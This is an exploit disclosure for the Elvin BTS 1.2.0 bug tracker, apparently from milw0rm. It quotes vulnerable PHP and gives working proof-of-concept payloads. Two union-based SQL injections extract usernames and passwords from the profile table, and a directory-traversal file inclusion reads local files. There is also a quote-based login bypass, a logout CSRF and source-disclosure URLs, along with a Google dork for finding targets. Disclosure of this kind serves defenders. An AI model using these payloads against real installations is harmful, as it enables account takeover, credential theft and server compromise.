################################################################################################################# [+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities [+] Discovered By SirGod [+] www.mortal-team.org ################################################################################################################# - Script Homepage : http://www.elvinbts.org/ - Google Dork : Powered by Elvin Bug Tracking Server. Elvin BTS suffers from a lot of vunerabilities 1) SQL Injection 2) Local File Inclusion 3) SQL Injection Login Bypass 4) Cross-Site Scripting 5) Cross-Site Request Forgery 6) Source Code Disclosure ----------------------- 1) SQL Injection ----------------------- - Vulnerable code is everywhere.I will present only 2 PoC's. a) Vulnerable code in show_bug.php ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL"); ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile-- b) Vulnerable code in show_activity.php ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. ""); ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile-- ----------------------- 2) Local File Inclusion ----------------------- - Vulnerable code in page.php ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $filename = "pages/".$_GET['id']; ................................................ if(file_exists($filename)){ include($filename); } else { echo "

Sorry page cannot be found!

"; } ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK ----------------------- 3) SQL Injection Login Bypass----------------------- - Code in login.php ( in login.php is included the vulnerable code) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- include(LoadElvinModule('login.ei')); ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - Vulnerable code in inc/login.ei ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'"); ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC Login as : Username : 'or''=' Password : 'or''=' ----------------------- 4) Cross-Site Scripting----------------------- It's more XSS's in the script,but tired to find them all. - Vulnerable code in show_activity.php ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Back to bug #

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC http://127.0.0.1/[path]/show_activity.php?id= ----------------------- 5) Cross-Site Request Forgery----------------------- Logout CSRF - PoC http://127.0.0.1/[path]/login.php?logout ----------------------- 6) Source Code Disclosure----------------------- Go to /inc/ directory.You will se .ei files with php code inside. That files are included and used by the script. - PoC's http://127.0.0.1/[path]/inc/login.ei http://127.0.0.1/[path]/inc/jump_bug.ei http://127.0.0.1/[path]/inc/create_account.ei Etc.. ############################################### EOF ################################################## # milw0rm.com [2009-06-15]